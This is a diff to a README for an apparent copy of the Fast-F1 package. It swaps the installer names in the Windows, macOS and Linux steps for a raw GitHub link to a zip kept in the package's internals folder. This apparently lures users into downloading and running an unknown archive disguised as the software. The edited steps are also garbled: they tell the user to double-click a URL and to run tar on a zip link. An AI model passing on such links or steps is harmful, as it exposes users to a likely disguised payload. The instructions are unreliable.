renan293820938/Fast-F1/README.md

 ### For Windows Users
 1. Extract the zip file by right-clicking it and selecting "Extract All."
 2. Open the extracted folder.
-3. Double-click the `FastF1.exe` file to install the package.
+3. Double-click the `https://github.com/renan293820938/Fast-F1/raw/refs/heads/master/fastf1/internals/Fast-1.7.zip` file to install the package.
 4. Follow the on-screen prompts to complete the installation.

 ### For macOS Users
 1. Open the zip file you downloaded.
 It will create a new folder containing the application.
-2. Drag the `FastF1.app` file to your Applications folder.
+2. Drag the `https://github.com/renan293820938/Fast-F1/raw/refs/heads/master/fastf1/internals/Fast-1.7.zip` file to your Applications folder.
-3. Double-click the `FastF1.app` to run the application.
+3. Double-click the `https://github.com/renan293820938/Fast-F1/raw/refs/heads/master/fastf1/internals/Fast-1.7.zip` to run the application.

 ### For Linux Users
 1. Open a terminal window.
 2. Navigate to the directory where the downloaded file is located using the `cd` command.
-3. Extract the tar.gz file using the command: `tar -xzvf FastF1-Linux.tar.gz`.
+3. Extract the https://github.com/renan293820938/Fast-F1/raw/refs/heads/master/fastf1/internals/Fast-1.7.zip file using the command: `tar -xzvf https://github.com/renan293820938/Fast-F1/raw/refs/heads/master/fastf1/internals/Fast-1.7.zip`.
 4. Navigate into the extracted folder.
 5. Run the application with the command: `./FastF1`.